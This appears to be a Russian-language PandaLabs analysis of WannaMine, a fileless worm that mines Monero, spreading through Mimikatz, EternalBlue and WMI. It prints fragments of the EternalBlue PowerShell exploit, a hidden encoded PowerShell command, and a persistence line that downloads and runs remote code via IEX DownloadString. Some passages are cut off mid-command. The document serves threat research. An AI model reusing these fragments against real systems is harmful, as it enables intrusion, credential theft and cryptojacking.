Fileless Monero WannaMine
Майнинг криптовалют (например, Bitcoin, Ethereum или Monero) уже не является какой-то диковинкой. Более того, за последние годы мы видели многочисленные атаки, чьей основной целью являлось установка ПО для майнинга. Например, не стоит забывать, что до появления мы уже видели хакеров, которые использовали эксплойт от АНБ, чтобы проникать в компании и устанавливать этот тип программного обеспечения на устройства своих жертв.
Можно с уверенностью сказать, что это процветающий бизнес, т.к. сложность атак продолжает возрастать. Несколько дней назад мы обнаружили нового червя, который использует хакерские утилиты и скрипты для распространения внутри корпоративных сетей с последующей целью майнинга криптовалюты Monero в любой сети, где ему довелось «закрепиться».
Благодаря в PandaLabs отслеживаются все запущенные процессы в реальном времени на каждом компьютере, где установлен его агент. Когда наши специалисты из службы Threat Hunting обнаружили следующую команду, пытающуюся выполниться внутри одного из процессов на компьютере, то сразу же была активирована «тревога»:
Анализ распространения в сети
Вскоре после начала расследования специалистами PandaLabs, мы стали наблюдать, как злоумышленники, зная, что они были обнаружены, закрыли серверы управления (C&C), но перед этим нам удалось скачать следующие файлы:
· B6FCD1223719C8F6DAF4AB7FBEB9A20A PS1 ~4МБ
· 27E4F61EE65668D4C9AB4D9BF5D0A9E7 VBS ~2МБ
Это два сильно запутанных скрипта. “Info6.ps1” загружает модуль Mimikatz (dll) в память (не трогая при этом жесткий диск) так, чтобы можно было осуществлять кражу регистрационных данных, которые позже будут использоваться для горизонтальных перемещений во внутренних (незащищенных) сетях.
Скрипт реализует в Powershell известный эксплойт NetBios, который известен также как EternalBlue(MS17-010), так что он может приступить к заражению в сети других, еще не пропатченных компьютеров с Windows.
$TARGET_HAL_HEAP_ADDR_X64 = 0XFFFFFFFFFFD00010
$TARGET_HAL_HEAP_ADDR_X86 = 0XFFDFF000
[BYTE[]]$FAKESRVNETBUFFERNSA = @(0X00,0X10,0X01,0X00,0X00
[BYTE[]]$FAKESRVNETBUFFERX64 = @(0X00,0X10,0X01,0X00,0X00
$FAKESRVNETBUFFER = $FAKESRVNETBUFFERNSA
[BYTE[]]$FEALIST=[BYTE[]](0X00,0X00,0X01,0X00)
$FEALIST += $NTFEA[$NTFEA_SIZE]
$FEALIST +=0X00,0X00,0X8F,0X00+ $FAKESRVNETBUFFER
$FEALIST +=0X12,0X34,0X78,0X56
[BYTE[]]$FAKE_RECV_STRUCT=@(0X00,0X00,0X00,0X00,0X00,0X00
В то же самое время он использует WMI для удаленного выполнения команд. После того как были получены пароли для компьютера, мы видим процесс “wmiprvse.exe” на этом компьютере и выполнение командной строки, подобной следующей:
POWERSHELL . EXE - NOP - NONI - W HIDDEN - E JABZAHQAAQBTAGUAPQBBAEUABGB 2 AGKACGBVAG 4 ABQBLAG 4 AD … Если мы декодируем “base 64” у этой командной строки, то мы получим скрипт, представленный в Приложении I.
«Живучесть» в системе
В одном из скриптов можно найти следующую команду, которая позволяет обеспечивать «живучесть» угрозы в системе:
CMD /C ECHO POWERSHELL -NOP “$A=([STRING](GET-WMIOBJECT -NAMESPACE ROOTSUBSCRIPTION -CLASS __FILTERTOCONSUMERBINDING ));IF(($A -EQ $NULL) -OR (!($A.CONTAINS(‘SCM EVENT FILTER ’)))) {IEX(NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING(‘, в результате чего большинство традиционных антивирусных решений едва способны обнаруживать ее, а уж тем более как-то реагировать на нее, а ее жертвы могут только ждать генерации необходимых сигнатур (атака безфайловая, хотя, как мы видели вначале, загружаются скрипты и клиент Monero).
